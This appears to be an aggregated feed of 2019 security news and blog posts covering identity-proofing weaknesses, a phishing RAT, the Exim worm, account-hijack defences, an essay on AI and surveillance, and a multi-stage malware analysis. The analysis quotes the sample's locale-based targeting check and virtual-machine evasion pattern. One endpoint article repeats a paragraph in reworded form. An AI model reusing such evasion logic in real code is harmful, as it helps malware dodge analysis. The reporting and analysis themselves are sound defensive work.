  • "The social newsfeed: When people open the app, the first thing they see is the newsfeed. This is the first step in educating users that Venmo is a social forum and the newsfeed allows you to see what others have chosen to share on Venmo and the experiences that are happening on Venmo.
  • "Users choose what to share: Like on other social apps, Venmo users can choose what they want to share and which audience they share it with. It is very clear in each payment what audience it is being shared with and we have made this even more prominent in recent years."

Eliminate Outdated Identity Proofing, Says GAO

Eliminate Outdated Identity Proofing, Says GAO

The remote identity proofing used by four large government agencies has been deemed outdated by a new report released by the U.S. Government Accountability Office (GAO).

According to the report, the Postal Service, Department of Veteran Affairs, Social Security Administration and the Centers for Medicare and Medicaid Services use outdated tactics to verify citizens’ data over the phone.

Of the six agencies GAO interviewed, only two have eliminated the use of knowledge-based verification methods. The remaining four government agencies rely on “consumer reporting agencies (CRAs) to conduct a procedure known as knowledge-based verification,” the report said. That is, individuals are asked questions based on information available in their credit reports.

As a result, any fraudster could potentially use information available from the 2017 Equifax breach or the latest hack of the week to answer security questions and start collecting social security checks of vulnerable Americans or embezzle veterans’ healthcare benefits.

“The risk that an attacker could obtain and use an individual’s personal information to answer knowledge-based verification questions and impersonate that individual led the National Institute of Standards and Technology (NIST) to issue guidance in 2017 that effectively prohibits agencies from using knowledge-based verification for sensitive applications,” the report said.

In addition to cost, agencies noted additional challenges to implementation, which include “mobile device verification[, which] may not always be viable because not all applicants possess mobile devices that can be used to verify their identities. Nevertheless, until these agencies take steps to eliminate their use of knowledge-based verification, the individuals they serve will remain at increased risk of identity fraud,” the report stated.

Beyond recommending that the agencies discontinue the practice of knowledge-based verification, the GAO also recommended that the NIST augment its technical guidance to include implementation guidance and assist agencies in adopting more security authentication processes.

“It’s unfortunate that data breaches have become a part of our modern lives. But this report shows most of the damage isn’t done in the initial breach. In fact, most of the real damage comes from account takeovers by social engineering contact center agents long after the breach. Here’s the reality – hackers aren’t going away. The solution is to de-weaponize personal information. Stop relying on it for authentication,” said Pat Cox, VP and GM at Neustar.

“Identity interrogation and knowledge-based authentication, where citizens verify their identity by demonstrating knowledge of personal information, as basic as address or date of birth – information which could have been gleaned from dozens of recent data breaches – isn’t stopping identity theft."

Hackers Are After Your Personal Data – Here’s How to Stop Them

Our lives are increasingly digital. We shop, socialize, communicate, watch TV and play games — all from the comfort of our desktop, laptop, or mobile device. But to access most of these services we need to hand over some of our personal data. Whether it’s just our name and email address or more sensitive information like Social Security and credit card numbers, this sharing of what’s known as personally identifiable information (PII) exposes us to risk. Why? Because hackers are looking for ways to steal and monetize it.

The latest FBI Internet Crime Complaint Center (IC3) report, recently released, paints an accurate picture of the scale of these online threats. Personal data breaches were among the top the reported cybercrimes in 2018, with 50,642 victims listed. They were linked to losses of over $148.8m. This is likely just the tip of the iceberg, as many incidents aren’t reported. Identity theft, which usually results from data theft, cost victims over $100m last year. And phishing attacks, which are commonly used to trick victims into handing over sensitive PII and passwords, accounted for over $48m in losses.

The message is clear: consumers need to take urgent steps to protect their most sensitive identity and financial data from online attackers. That’s why Trend Micro has produced this guide, to help you identify where your most sensitive data is stored, how attackers might try to steal it and how best to secure it.

What is at risk?

The bottom line is that hackers are out to make money. Although they can do this via online extortion and ransomware, it is most commonly done via data theft. Once they have your PII and financial details they sell it on dark web sites for fraudsters to use in follow-on identity fraud. They could use banking log-ins to hijack your bank account and drain it of funds. Or they could open new credit cards in your name and run up huge debts.

Identity fraud is a growing threat to US consumers. It affected 14.4m of us in 2018, leading to losses of $1.7bn — more than double the 2016 figure.

As we’ve mentioned, the hackers are after as much PII as they can get their hands on. The more they have, the easier it is for them to stitch together a convincing version of your identity to trick the organizations you interact with online. It could range from names, addresses and dates of birth at one end to more serious details like Social Security numbers, bank account details, card numbers, and health insurance details at the other.

Most of this information is stored in your online accounts, protected by a password, so they will often put a great deal of effort into guessing or stealing the all-important log-ins. Even accounts you might not think would be of interest to a hacker can be monetized. Access to your Uber account, for example, could be hijacked and sold online to offer free trips to the buyer. Or your Netflix account log-ins may be sold to provide free streaming services to whoever pays for them.

Now, hackers may go after the firms directly to steal your personal data. In the past we’ve seen mega breaches at the likes of Uber (affecting 57m global users) and Yahoo (affecting 3bn users). But they might also target you individually. Sometimes they may use information they already know about you to trick you via phishing into handing over more, as with tax fraud and sextortion blackmail attempts, and sometimes they might use already breached passwords to try and hack into your accounts, hoping you reuse the same log-ins across multiple sites.

While you’re most likely to get reimbursed by your bank eventually for financial losses stemming from identity fraud, there’s a major impact beyond this. Online data theft and the fraud that follows could lead to:

  • Out-of-pocket costs to recover your identity
  • Emotional distress: 75% of victims report suffering severe distress
  • Lower credit scores
  • Time and effort disputing charges/recouping money: it’s estimated to take an average of six months and 200 hours of work to recover your identity following an attack.

How do they steal it?

There are plenty techniques the bad guys have at their disposal to part you from your data and money. They’re supported in this by a vast underground cybercrime economy, facilitated by those dark web sites. This not only offers a readymade platform for them to sell their stolen data to fraudsters, but also provides them with hacking tools, advice and cybercrime services. This black market economy could be worth as much as $1.5tr per year.

The hackers may choose to:

  • Target you with a phishing scam, spoofing an email to appear as if sent from an official company (the IRS, your bank, insurer, ISP etc.)
  • Launch automated attacks, either using your log-ins from other sites that have been stolen, or else using online tools to try multiple combinations of easy-to-guess passwords like “passw0rd”
  • Exploit vulnerabilities on the websites you visit to gain access to your account
  • Infect legitimate-looking mobile apps with malware and wait until you unwittingly download
  • Intercept your private data sent over public Wi-Fi: for example, if you log-in to your online banking account on public Wi-Fi, a hacker may be able to monitor everything you do.

How can I secure it?

The good news is that there are plenty of simple things you can do to keep your data safe and secure — most of them free of charge. Consider the following:

  • Use a long, strong and unique password for each website and application. To help you do this, use an online password manager to store and recall these log-ins when needed.
  • Change your passwords immediately if a provider tells you your account may have been breached
  • Use two-factor or multi-factor authentication (2FA/MFA) MFA if available for added log-in security.
  • Only enter PII into sites which start with “HTTPS” in the address bar.
  • Don’t click on links or open attachments in unsolicited emails or texts.
  • Be careful about over-sharing personal and financial details on social media.
  • Only download apps from official app stores like the Apple App Store or Google Play.
  • Don’t access any sensitive accounts (banking, email etc) on public Wi-Fi without using a VPN.
  • Invest in good AV from a trusted provider for all your PCs and mobile devices. It should include anti-phishing and anti-spam.
  • Keep all operating systems and apps on the latest versions to minimize the number of vulnerabilities hackers could target.
  • Keep tabs on your financial transactions so you can quickly spot if an identity fraudster has been impersonating you.
  • In the advent of a breach involving your credit (aka Equifax), check your credit report and security status from Equifax, TransUnion, Experian, and Innovis and put a security freeze on it if necessary.

The post Hackers Are After Your Personal Data – Here’s How to Stop Them appeared first on .

How Safe Is Your Endpoint From Cyber Attack

In the current business environment, any device that can connect to a network is termed as “endpoint” from desktops, laptops, tablets, smartphones and, more recently, IoT devices. As devices evolve, threats continue keeping its pace. Unfortunately, today’s firewalls and antivirus are not strong enough to cope with the ever-changing environment of a business. Endpoints are now exposed to ransomware, phishing, malicious advertisements, software subversion, and other attacks. Not to mention that attackers use zero-day attacks that use previously unidentified vulnerabilities to send malicious programs to endpoint computers.

How do today’s businesses protect against these malicious threats? First, before choosing the right Endpoint Protection (EPP) platform, companies need to gain a deeper knowledge of “endpoints”.

Unknown files that trigger the change

According to a recent study by Comodo Cybersecurity, over the past five years, unknown files, a potentially malicious and unrecognizable executable, have exploded. Every day, more than 300,000 malicious files are detected. Managing new or unknown files is one of the most important features of an EPP.

Most EPP products use a trust-based assumption, called ‘default allow posture’ for new or unknown files. This method allows files to have unlimited write privileges to system files, in addition to known bad files. This means that files not identified as bad must be good or secure. As you can imagine, one of the biggest problems with the “default allow” security feature is that cybercriminals are constantly developing new variants to avoid detecting on the endpoints. This can expose companies to threats for days, weeks, or even months before they are detected.

Sandbox and beyond

In order to successfully fight cyber criminals, many EPP vendors have integrated sandbox technology into their products to combat malicious software. For those who are unfamiliar, the sandbox is an isolated virtual environment that mimics the endpoint operating environment to safely run unknown files without the risk of damaging host or network devices.

This solution is gradually losing its effectiveness. Cybercriminals create threats that can detect when security cages (sandbox) are being used and automatically take action to prevent detection. In addition, sandboxes are becoming increasingly resource intensive and complex, slowing down their ability to handle threats without compromising productivity.

The Need for a Zero Trust Architecture

As cybercriminals are using the Default Allow approach to their benefit, while also modifying these variants to bypass sandboxes, companies need a better solution. The obvious answer is to adopt a Zero Trust architecture, where unknown executables are never trusted and always verified, without impacting user productivity. To successfully achieve a Zero Trust architecture, 100% of unknown files must be instantly contained and analyzed in the cloud and by humans to prevent breaches. Additionally, the business still needs to operate, and users should not have to experience productivity loss or impact. Successfully achieving a Zero Trust architecture will bulletproof your business from damage.

With cybercriminals taking advantage of the default allow approach and modifying that variant to avoid isolated spaces, businesses need a better solution. The obvious answer is the adoption of the Zero Trust architecture, where unknown executables are verified without compromising user productivity. To successfully achieve the zero trust architecture, 100% of the unknown files must be immediately loaded and analyzed in the cloud and by individuals to avoid violations. In addition, the company must continue to operate and users do not have to suffer productivity losses or impacts. Successfully reaching the Zero Trust architecture ensures that your business is safe from cyber attack.

Best Practices for Evaluating EPP

Protecting the endpoints of malicious software is one of the most important aspects of securing a company’s IT resources. Endpoint protection must be part of a holistic IT security approach in which perimeter network security solutions secure the boundary between internal networks and service provider networks, and endpoint security further reduces the risk of threats or malicious activity affecting IT operations.

The first step in choosing an EEP solution is evaluating the needs of the business, which should include capacity and scalability, compliance, budget, and policies. The next step is to closely examine the capabilities, which should include, but is not limited to centralized management, threat detection and blocking, unknown file handling, file reputation scoring and support to achieve a Zero Trust architecture.

Choosing the right EPP

In addition to these best practices, Gartner recently released a research paper that strongly recommends that security managers and risk managers conduct a thorough concept to accurately determine the endpoint protection platform that is better suitable.

Related Resources:

Best Endpoint Protection Software

Endpoint Security : Why Is Endpoint Protection Good?

The post How Safe Is Your Endpoint From Cyber Attack appeared first on .

New phishing campaign targets bank customers with WSH RAT

Security researchers at Cofense have spotted a phishing campaign aimed at commercial banking customers distributing a new remote access trojan (RAT) tracked as WSH RAT.

Security experts at Cofense Phishing Defence Center have spotted a phishing campaign aimed at commercial banking customers that is distributing a new remote access trojan tracked as WSH RAT.

The name WSH likely refers to the legitimate Windows Script Host, which is an application used to execute scripts on Windows machines.

Threat actors are using the RAT to deliver keyloggers and information stealers.

“The Cofense Phishing Defense Center™ (PDC)  and Cofense Intelligence™ have identified a new variant of Houdini Worm targeting commercial banking customers with campaigns containing either URLs, .zip, or .mht files.” reads the analysis published by Cofence. “This new variant is named WSH Remote Access Tool (RAT) by the malware’s author and was released on June 2, 2019. Within five days, WSH RAT was observed being actively distributed via phishing. “

WSH Remote Access Tool (RAT) is a variant of the VBS (Visual Basic Script) based Houdini Worm (H-Worm) that first appeared in the threat landscape in 2013 and was updated in 2016.

WSH Remote Access Tool (RAT) differs from Houdini because it is in JavaScript and uses a different User-Agent string and delimiter character when communicating with its command-and-control (C2) server.

The phishing messages contain an MHT file that includes a href link which once opened, will direct victims to a .zip archive containing a version of WSH RAT.

WSH RAT attack

The RAT allows attackers to steal sensitive data, including passwords from victims’ browsers and email clients, it also implements keylogging capabilities. The experts pointed out that the RAT allows to remotely control the victim’s systems, it is also able to kill anti-malware solutions and disable the Windows UAC.

The authors of the malware are offering for rent the WSH RAT, buyers can pay a subscription fee of $50 per month to use all features they have implemented.

“WSH RAT is being sold for $50 USD a month and has an active marketing campaign.” continues the post. “The threat operators tout the RAT’s many features such as WinXP-Win10 compatibility, several automatic startup methods, and a large variety of remote access, evasion, and stealing capabilities.”

Once the RAT reached the C2 server, WSH RAT will download and drop three additional files having .tar.gz extension but that are actually PE32 executable files

The three downloaded payloads are a keylogger, a mail credential viewer, a browser credential viewer. The three components are from third parties and were not developed by the WSH RAT operator.

The three malicious tools are a keylogger, a mail credential viewer, and a browser credential viewer developed by third parties and used by the campaign operators to collect credentials and other sensitive information.

“This re-hash of Hworm proves that threat operators are willing to re-use techniques that still work in today’s IT environment. The phishing campaign that delivered the .zip containing a MHT file was able to bypass the Symantec Messaging Gateway’s virus and spam checks.” continues the post.

Experts published a list of indicators of compromise (IOCs).

Pierluigi Paganini

(SecurityAffairs – WSH Remote Access Trojan, hacking)

The post New phishing campaign targets bank customers with WSH RAT appeared first on Security Affairs.

Microsoft Urges Azure Customers to Patch Exim Worm

Microsoft Urges Azure Customers to Patch Exim Worm

Microsoft has urged Azure users to update their systems following the discovery of a major new attack campaign targeting popular email server software.

The worm, which Infosecurity reported on last week, targets mail transfer agent product Exim running on Linux-based email servers. It’s claimed that Exim is running on over half (57%) of the world’s email servers, with as many as 3.5 million vulnerable to the new attack.

In a security update on Friday, Microsoft confirmed that the attack imperils servers running Exim version 4.87 to 4.91. It said that although Azure has “controls” in place to prevent the spread of the worm, customers could still be vulnerable to infection and should update their systems as soon as possible.

“Customers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs. As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim,” Microsoft explained.

“There is a partial mitigation for affected systems that can filter or block network traffic via?Network Security Groups (NSGs). The affected systems can mitigate Internet-based ‘wormable’?malware or advanced malware threats that could exploit the vulnerability. However, affected systems are still vulnerable to Remote Code Execution?(RCE)?exploitation if the attacker’s IP Address is permitted through Network Security Groups?”

Two waves of attack have been spotted in the wild, downloading a cryptocurrency mining payload to monetize the threat. The more sophisticated of the two uses Tor services and creates “deceiving windows icon files” to throw security teams off the scent.

As well as downloading the payload, the malware searches for additional vulnerable servers on the internet, connects to them, and infects them with the initial script, according to Cybereason.

Oregon State University (OSU) Discloses Data Breach

Oregon State University (OSU) has disclosed a security incident that potentially affected the personally identifiable information of some students and their families. On 14 June, OSU announced that the security incident occurred back in May when external actors hacked a university employee’s email account. At the time of compromise, the email account contained the personal […]… Read More

The post Oregon State University (OSU) Discloses Data Breach appeared first on The State of Security.

Data, Surveillance, and the AI Arms Race

According to foreign policy experts and the defense establishment, the United States is caught in an artificial intelligence arms race with China -- one with serious implications for national security. The conventional version of this story suggests that the United States is at a disadvantage because of self-imposed restraints on the collection of data and the privacy of its citizens, while China, an unrestrained surveillance state, is at an advantage. In this vision, the data that China collects will be fed into its systems, leading to more powerful AI with capabilities we can only imagine today. Since Western countries can't or won't reap such a comprehensive harvest of data from their citizens, China will win the AI arms race and dominate the next century.

This idea makes for a compelling narrative, especially for those trying to justify surveillance -- whether government- or corporate-run. But it ignores some fundamental realities about how AI works and how AI research is conducted.

Thanks to advances in machine learning, AI has flipped from theoretical to practical in recent years, and successes dominate public understanding of how it works. Machine learning systems can now diagnose pneumonia from X-rays, play the games of go and poker, and read human lips, all better than humans. They're increasingly watching surveillance video. They are at the core of self-driving car technology and are playing roles in both intelligence-gathering and military operations. These systems monitor our networks to detect intrusions and look for spam and malware in our email.

And it's true that there are differences in the way each country collects data. The United States pioneered "surveillance capitalism," to use the Harvard University professor Shoshana Zuboff's term, where data about the population is collected by hundreds of large and small companies for corporate advantage -- and mutually shared or sold for profit The state picks up on that data, in cases such as the Centers for Disease Control and Prevention's use of Google search data to map epidemics and evidence shared by alleged criminals on Facebook, but it isn't the primary user.

China, on the other hand, is far more centralized. Internet companies collect the same sort of data, but it is shared with the government, combined with government-collected data, and used for social control. Every Chinese citizen has a national ID number that is demanded by most services and allows data to easily be tied together. In the western region of Xinjiang, ubiquitous surveillance is used to oppress the Uighur ethnic minority -- although at this point there is still a lot of human labor making it all work. Everyone expects that this is a test bed for the entire country.

Data is increasingly becoming a part of control for the Chinese government. While many of these plans are aspirational at the moment -- there isn't, as some have claimed, a single "social credit score," but instead future plans to link up a wide variety of systems -- data collection is universally pushed as essential to the future of Chinese AI. One executive at search firm Baidu predicted that the country's connected population will provide them with the raw data necessary to become the world's preeminent tech power. China's official goal is to become the world AI leader by 2030, aided in part by all of this massive data collection and correlation.

This all sounds impressive, but turning massive databases into AI capabilities doesn't match technological reality. Current machine learning techniques aren't all that sophisticated. All modern AI systems follow the same basic methods. Using lots of computing power, different machine learning models are tried, altered, and tried again. These systems use a large amount of data (the training set) and an evaluation function to distinguish between those models and variations that work well and those that work less well. After trying a lot of models and variations, the system picks the one that works best. This iterative improvement continues even after the system has been fielded and is in use.

So, for example, a deep learning system trying to do facial recognition will have multiple layers (hence the notion of "deep") trying to do different parts of the facial recognition task. One layer will try to find features in the raw data of a picture that will help find a face, such as changes in color that will indicate an edge. The next layer might try to combine these lower layers into features like shapes, looking for round shapes inside of ovals that indicate eyes on a face. The different layers will try different features and will be compared by the evaluation function until the one that is able to give the best results is found, in a process that is only slightly more refined than trial and error.

Large data sets are essential to making this work, but that doesn't mean that more data is automatically better or that the system with the most data is automatically the best system. Train a facial recognition algorithm on a set that contains only faces of white men, and the algorithm will have trouble with any other kind of face. Use an evaluation function that is based on historical decisions, and any past bias is learned by the algorithm. For example, mortgage loan algorithms trained on historic decisions of human loan officers have been found to implement redlining. Similarly, hiring algorithms trained on historical data manifest the same sexism as human staff often have. Scientists are constantly learning about how to train machine learning systems, and while throwing a large amount of data and computing power at the problem can work, more subtle techniques are often more successful. All data isn't created equal, and for effective machine learning, data has to be both relevant and diverse in the right ways.

Future research advances in machine learning are focused on two areas. The first is in enhancing how these systems distinguish between variations of an algorithm. As different versions of an algorithm are run over the training data, there needs to be some way of deciding which version is "better." These evaluation functions need to balance the recognition of an improvement with not over-fitting to the particular training data. Getting functions that can automatically and accurately distinguish between two algorithms based on minor differences in the outputs is an art form that no amount of data can improve.

The second is in the machine learning algorithms themselves. While much of machine learning depends on trying different variations of an algorithm on large amounts of data to see which is most successful, the initial formulation of the algorithm is still vitally important. The way the algorithms interact, the types of variations attempted, and the mechanisms used to test and redirect the algorithms are all areas of active research. (An overview of some of this work can be found here; even trying to limit the research to 20 papers oversimplifies the work being done in the field.) None of these problems can be solved by throwing more data at the problem.

The British AI company DeepMind's success in teaching a computer to play the Chinese board game go is illustrative. Its AlphaGo computer program became a grandmaster in two steps. First, it was fed some enormous number of human-played games. Then, the game played itself an enormous number of times, improving its own play along the way. In 2016, AlphaGo beat the grandmaster Lee Sedol four games to one.

While the training data in this case, the human-played games, was valuable, even more important was the machine learning algorithm used and the function that evaluated the relative merits of different game positions. Just one year later, DeepMind was back with a follow-on system: AlphaZero. This go-playing computer dispensed entirely with the human-played games and just learned by playing against itself over and over again. It plays like an alien. (It also became a grandmaster in chess and shogi.)

These are abstract games, so it makes sense that a more abstract training process works well. But even something as visceral as facial recognition needs more than just a huge database of identified faces in order to work successfully. It needs the ability to separate a face from the background in a two-dimensional photo or video and to recognize the same face in spite of changes in angle, lighting, or shadows. Just adding more data may help, but not nearly as much as added research into what to do with the data once we have it.

Meanwhile, foreign-policy and defense experts are talking about AI as if it were the next nuclear arms race, with the country that figures it out best or first becoming the dominant superpower for the next century. But that didn't happen with nuclear weapons, despite research only being conducted by governments and in secret. It certainly won't happen with AI, no matter how much data different nations or companies scoop up.

It is true that China is investing a lot of money into artificial intelligence research: The Chinese government believes this will allow it to leapfrog other countries (and companies in those countries) and become a major force in this new and transformative area of computing -- and it may be right. On the other hand, much of this seems to be a wasteful boondoggle. Slapping "AI" on pretty much anything is how to get funding. The Chinese Ministry of Education, for instance, promises to produce "50 world-class AI textbooks," with no explanation of what that means.

In the democratic world, the government is neither the leading researcher nor the leading consumer of AI technologies. AI research is much more decentralized and academic, and it is conducted primarily in the public eye. Research teams keep their training data and models proprietary but freely publish their machine learning algorithms. If you wanted to work on machine learning right now, you could download Microsoft's Cognitive Toolkit, Google's Tensorflow, or Facebook's Pytorch. These aren't toy systems; these are the state-of-the art machine learning platforms.

AI is not analogous to the big science projects of the previous century that brought us the atom bomb and the moon landing. AI is a science that can be conducted by many different groups with a variety of different resources, making it closer to computer design than the space race or nuclear competition. It doesn't take a massive government-funded lab for AI research, nor the secrecy of the Manhattan Project. The research conducted in the open science literature will trump research done in secret because of the benefits of collaboration and the free exchange of ideas.

While the United States should certainly increase funding for AI research, it should continue to treat it as an open scientific endeavor. Surveillance is not justified by the needs of machine learning, and real progress in AI doesn't need it.

This essay was written with Jim Waldo, and previously appeared in Foreign Policy.

Twitter Shuts Down 5000 State-Sponsored Accounts

Twitter Shuts Down 5000 State-Sponsored Accounts

Twitter has taken down nearly 5000 fake accounts, most of them apparently backed by the Iranian state, in a bid to clean the platform of government-sponsored attempts to spread propaganda.

The social network claimed in a post last week that it had closed 4779 accounts linked to Tehran, 1666 of which tweeted nearly two million times, with content “that benefited the diplomatic and geostrategic views of the Iranian state.”

Another subset of 248 accounts were engaged with discussions related to Israel, while 2865 “employed a range of false personas to target conversations about political and social issues in Iran and globally.”

Four accounts were lined to the infamous Internet Research Agency (IRA), the Kremlin-linked organization responsible for a mass disinformation campaign on social media ahead of the 2016 US Presidential election.

Also removed by Twitter during this cull were 130 fake accounts linked to organizations including Esquerra Republicana de Catalunya, which spread content designed to “inorganically influence the conversation” about Catalan independence.

Twitter closed down a further 33 accounts run by a “commercial entity” operating in Venezuela “that were engaging in platform manipulation targeted outside of the country.”

“Our Site Integrity team is dedicated to identifying and investigating suspected platform manipulation on Twitter, including potential state-backed activity. In partnership with teams across the company, we employ a range of open-source and proprietary signals and tools to identify when attempted coordinated manipulation may be taking place, as well as the actors responsible for it,” wrote Twitter head of site integrity, Yoel Roth.

“We also partner closely with governments, law enforcement, and our peer companies to improve our understanding of the actors involved in information operations and develop a holistic strategy for addressing them.”

Instagram Tests Changes to Help Users Recover Hacked Accounts

Following an innumerable number of complaints, Instagram has started testing new methods to recover hacked accounts.

Hackers have been targeting many high-profiled Instagram accounts and there was a wave of complaints related to such incidents. High-profile accounts, like those of lifestyle and fitness influencers, were hacked. The hackers would execute the attack via phishing emails supposedly coming from brands that would want to sponsor the target. Once they get access to targets’ accounts, they would change passwords and then demand a payment in Bitcoin to get the account recovered. Following these attacks, users had flooded Instagram with complaints and they were even blaming the company of not giving proper customer support. Users were so frustrated with Instagram’s cumbersome account recovery process that they turned to other experts for help.

Now Instagram has announced the testing of changes that could make it easier for users to recover hacked accounts. Instagram also introduces some security features that would make it harder for cybercriminals to steal Instagram usernames. Thus, it’s a two-pronged approach with the focus on adopting measures to prevent instagram account hacking and also on introducing measures to help users recover hacked accounts.

Instagram begins testing the first change on Monday, June 17, 2019. As per this change, users, if they find it difficult to sign in with Instagram telling them that the password they are entering is incorrect (as a result of hackers changing the password), could click the ‘Need more help’ option on the login page and get a six-digit code sent to their email address or phone number. This code would allow them to regain access to their accounts.

However, there are possibilities that hackers sometimes have access to the victims’ email accounts or even their phone numbers. Hence, to solve this issue, Instagram has taken additional measures to ensure that the codes sent to a user’s email address or phone number cannot be used to access the account from a different device. This new process that’s being tested would make it possible for a hacking victim to recover instagram account even if the hacker has changed the account’s username. This is significant since hackers had been targeting users with sought-after handles, including first names, single words etc. The new change that Instagram is testing would also reportedly ensure that a person’s username remains safe for a period of time after any kind of account changes, thus making it impossible for someone else to claim the username even if the original user loses access to the Instagram account following a hack. This feature, currently available on Android, will now be available to iOS users as well.

Experts are of the opinion that the new changes that are being tested would have a great impact on Instagram account takeovers by cybercriminals and would be of great help to users. Instances of hackers trying to claim usernames for accounts that are hacked and instances of hackers using other devices to access targeted accounts would definitely go down, say the experts.

Related Resources:

Instagram Accidentally Exposed Some User Passwords

Instagram New Feature to Share Location Data with Facebook

The post Instagram Tests Changes to Help Users Recover Hacked Accounts appeared first on .

Web-based DNA sequencers getting compromised through old, unpatched flaw

Unknown attackers are trying to exploit a vulnerability in dnaLIMS, a Web based bioinformatics laboratory information management system, to implant a bind shell into the underlying web server. Researcher Ankit Anubhav first noticed the attacks on June 12 and they are apparently still going on. About dnaLIMS DnaLIMS is developed by Colorado-based dnaTools. It provides software tools for processing and managing DNA sequencing requests. These tools use browsers to access a UNIX-based web server on … More

The post Web-based DNA sequencers getting compromised through old, unpatched flaw appeared first on Help Net Security.

Europol Gamifies Cryptocurrency Crime Prevention

Europol Gamifies Cryptocurrency Crime Prevention

Europol trained its members on cryptocurrency-related crime at a conference last week, announcing the development of a new game.

The cross-jurisdictional law enforcement organization claimed that over 300 experts in cryptocurrency, from both the police and private sector, attended its headquarters in The Hague for the region’s largest conference of its kind last week.

The aim was to share best practice and look at new partnership-building opportunities to combat the growth in cybercrime linked to digital currencies, as well as techniques for recovering virtual assets stolen by hackers.

At the show, Europol announced the development of a new “cryptocurrency tracing game” developed in partnership with CENTRIC (Centre of Excellence in Terrorism, Resilience, Intelligence and Organised Crime Research).

Set to launch in October, the unnamed title will be the first “law enforcement training opportunity” to use gamification techniques to train officers on cryptocurrency and investigation.

“It will allow law enforcement officers to get hands-on training and advice on tracing cryptocurrencies in criminal investigations,” according to Europol.

The news comes as the popularity of illicit cryptocurrency mining appears to be waning among the cybercrime community – at least in terms of attacks on consumers.

Consumer detections of cryptojacking dropped to almost zero in Q1, thanks in part to the decision by Coinhive to shut down its operations, although attacks against businesses continue to rise, especially in APAC, Malwarebytes said last month.

Meanwhile, attacks on cryptocurrency firms continue unabated. Just last week, hackers made off with nearly $9.7m in virtual coins after a successful attack on digital wallet provider GateHub.

Among the experts at the Europol conference were representatives from: Binance, BitBay,, Bitfinex, BitFlyer Europe, Bitnovo, Bitonic, Bitpanda, BitPay, Bitstamp, CEX, Coinbase, Coinfloor, Coinhouse, Coinpayments, CoinsPaid, Ledger, Litebit, LocalBitcoins, OKCoin, Shapeshift, SpectroCoin, Tether and Xapo.

They shared best practices on implementing Know Your Customer (KYC) policies and risk-based approaches to suspicious transactions, according to Europol.

[Results] CLB Super Holder Event

Greetings Cloudbric community!

Thank you for your interest in our CLB Super Holder event which has now come to an end.

On exactly June 17, at 4pm KST, the price of CLB sat at 10.4 KRW (approx. $00.0088 USD).

As mentioned, all eligible CLB holders will receive a guaranteed minimum of 5% cumulative bonus distributions (CLB and CLBK tokens) of their total CLB stake as long as they hold the minimum CLB token amount.

Please check the airdrop list and look to see if your email was accepted in alignment with the guidelines.

Airdrop list

Please note that users that had already transferred CLB tokens prior to June 11th, 2019 at 2pm KST will receive an additional 200 CLB bonus airdrop to help mitigate any issues or confusion regarding wallet addresses and transfers.

The winners of the CLB Super Holder event will be issued their CLB tokens by June 24 and will receive their CLBK tokens after Klaytn’s main net launch. More details soon to come.

Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post [Results] CLB Super Holder Event appeared first on Cloudbric.

From Targeted Attack to Untargeted Attack

Today I’d like to share an interesting and heavily obfuscated Malware which made me thinking about the meaning of ‘Targeted Attack’.

Nowadays a Targeted Attack is mostly used to address state assets or business areas. For example a targeted attack might address Naval industry (MartyMcFly example is definitely a great example) or USA companies (Botnet Against USA, Canada and Italy is another great example) and are mainly built focusing specific target sectors. When I looked into at the following sample (which is a clear stereotype of an increasing trend of similar threats) I noticed a paradigm shift from: “What to target” to “what to untarget”. In other words it looks like the attacker does’t have a clear vision about his desired victims but contrary he has real clear intentions to what kind of victims must be avoided. But let’s start from the beginning.

Looking for a public sample submitted to Yomi (Yoroi’s public SandBox system) it caught my eyes the following one (sha256: c63cfa16544ca6998a1a5591fee9ad4d9b49d127e3df51bd0ceff328aa0e963a)

Public Submitted Sample on Yomi

The file looks like a common XLS file within low Antivirus detection rate as shown in the following image (6/63).

Antivirus Detection Rate

By taking a closer look to the Office file it’s easy to spot “Auto Open” procedures in VBA. The initial script is obfuscated through integer conversion and variable concatenation. A simple break-point and a message box to externalize the real payload would be enough to expose the second stage, which happens to be written in powershell.

Deobfuscated Stage1 to Obfuscate Stage2

The second stage is obfuscated through function array enumeration and integer conversion as well. It took some minutes to understand how to move from the obfuscated version to a plain text readable format as shown in the next picture.

Stage2 Obfuscated
Stage2 DeObfuscated

Here comes the interesting side of the entire attack chain (at least in my persona point of view). As you might appreciate from the deo-bfuscated Stage2 code (previous image) two main objects are downloaded and run from external sources. The ‘*quit?’ object downloads a Windows PE (Stage3_a) and runs it, while the ‘need=js’ object returns an additional obfuscated javascript stage, let’s call it Stage3_b. We’ll take care about those stages later on, for now let’s focus on the initial conditional branch which discriminates the real behavior versus the fake behavior; in other words it decides if run or stop the execution of the real behavior. While the second side of the conditional branch is quite a normal behavior match "VirtualBox|VMware|KVM",which tries to avoid the execution on virtual environments (trying to avoid detection and analysis), the first side is quite interesting. (GET-UICulture).Name -match "RO|CN|UA|BY|RU" tries to locate the victim machine and decides to attack everybody but not Romania, Ukraine, China, Russia and Belarus. So we are facing an one’s complement to targeted attack. I’d like to call it “untargeted” attack, which is not an opportunistic attack. Many questions come in my mind, for example why do not attack those countries ? Maybe does the attacker fear those countries or does the attacker belong to that area ? Probably we’ll never get answers to such a questions but we might appreciate this intriguing attack behavior. (BTW, I’m aware this is not the first sample with this characteristic but I do know that it’s a increasing trend). But let’s move on the analysis.


Stge3_b is clearly the last infection stage. It looks like a romantic Emotet according to many Antivirus so I wont invest timing into this well-known Malware.


This stage looks like a quite big and obfuscated Javascript code. The obfuscation implements three main techniques:

  • Encoded strings. The strings have been encoded in different ways, from “to Integer” to “Hexadecimal”.
  • String concatenation and and dynamic evaluation. Using eval to dynamically extract values which would be used to decode more strings
  • String Substitutions. Through find and replace functions and using loop to extract sub-strings the attacker hides the clear text inside charset noise

After some “hand work” finally Stage3_b deobfuscated came out. The following image shows the deobfuscation versus obfuscation section. We are still facing one more obfuscated stage, lets call it Stage4_b which happens to be, again, an obfuscated powershell script… how about that !?

Stage3_b Obfuscated
Stage3_b Deobfuscated (obfuscated Stage4_b)

Stage4_b uses the same obfuscation techniques seen in Stage2, so let’s use the same deobfusction technique, so let’s do it ! Hummm, but .. wait a minute… we already know that, it’s the deobfuscated Stage2! So we have two command and control servers serving the final launching script and getting persistence on the victim.

Deobfuscated Stage4_b


